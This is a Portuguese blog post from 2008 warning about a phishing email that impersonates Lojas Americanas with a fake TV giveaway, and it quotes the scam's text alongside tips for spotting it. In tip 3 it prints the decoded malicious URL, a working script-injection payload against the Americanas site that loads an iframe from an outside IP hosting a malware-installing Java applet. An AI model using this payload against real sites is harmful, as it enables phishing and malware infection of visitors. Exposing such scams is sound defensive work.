Balela.info - Um blog sem foco

Entre os vários tipos de Phishing Scam que existem, os que dão mais resultado são os que oferecem algum prêmio. O fato de oferecer algo caro e que seja um sonho de consumo da pessoa, um carro, celular, computador, TV de Plasma, o que seja, faz com que o destinatário fique cego e não perceba os truques presentes.

Esse Scam é até muito bem feito, pois usa uma técnica diferente para direcionar o usuário ao endereço malicioso e applet java para instalar malware. Algo chamado Javascript Injection. O link possui uma instrução que invalida todo o restante, então, para os leigos, o link está corretamente direcionado para o site das Lojas Americanas. Outras dicas são:

1. Você alguma vez comprou no site Americanas.com ou Submarino.com? Caso contrário, qualquer e-mail que chegue dizendo-se passar por um desses serviços é MENTIRA. Apague imediatamente.
2. Não achou estranho você ser “sorteado” e nem mesmo o seu nome aparecer no e-mail? E como assim você precisa “validar seu e-mail”? Eles sabem quem é você, possuem seu endereço completo e seu telefone. Algum motivo para enviarem um e-mail?
3. Note o link. Ele veio enorme e com muitos caracteres estranhos, não? Isso é uma tentativa de execução de javascript direto no seu navegador. Recebi 2 e-mails desses, mas só o segundo continha o código correto, o primeiro não fazia absolutamente nada, ou seja, os “hackers phodões” fizeram merda e erraram o código. A URL depois de decodificada fica assim:
   

   http://carrinho.americanas.com.br/portal/meuCadastro.portal?_nfpb=true& LoginControllerPortlet_actionOverride=<script>window.onload=function(){ with(document.body.style){border=”none”;margin=”0 0 0 0″};document.body.innerHTML=’<iframe src=http://203.124.22.143/java/index.htm style=border:none;height:700;width:1000>’};document.title=’Americanas’ </script><textarea>

4. Ao entrar no site que o e-mail tentava direcionar, abre-se uma tela pedindo solicitação para instalar um JAVA. Atenção! Um applet java possui os mesmos direitos de acesso ao seu computador que o usuário que o está executando, em sua maioria, o administrador. Isso é um perigo potencial e instalar essa solicitação é altamente desaconselhada. A tela exibida está abaixo.

Mensagem original (screenshot)

Tela que simula o site Americanas.com (screenshot)

Mensagem original (texto)

Você está entre os 10 e-mails sorteados da Promoção Cliente Especial. TV 42″ LCD (1920 X 1080 Pixels), Full HD, 2 Conexões HDMI e Double Window - 42LY3RF - LG

Seu e-mail foi sorteado entre os milhares em nosso banco de dados e você foi selecionado para ganhar uma TV LCD! Apenas 10 e-mails foram sorteados, e desses 10, apenas 1 será o ganhador da Promoção Americanas Cliente Especial. Você está na reta final para ter uma TV LCD 42″, basta acessar nosso link clicando no botão Validar Email logo abaixo e confirmar seu nome e endereço

ATENÇÃO: A Americanas.com não solicita dados como cartão de credito por e-mail.

Sempre confira se o link é para o site verdadeiro da Americanas.com

Nunca informe sua senha para terceiros.

Seu e-mail precisa ser verificado por você caso deseje participar da promoção. Para isso basta clicar no botão Validar E-mail.

Mensagem recebida por e-mail em 16/04/2008

• Setor financeiro americanas: relatorio de debito
• WebCompras GOL Linhas Aéreas - Compra realizada com sucesso. Dados do e-ticket.
• Seu pedido foi encaminhado - Scam Siciliano
• SBT: seu aparelho móvel foi premiado
• Natal amplia ocorrências de SCAM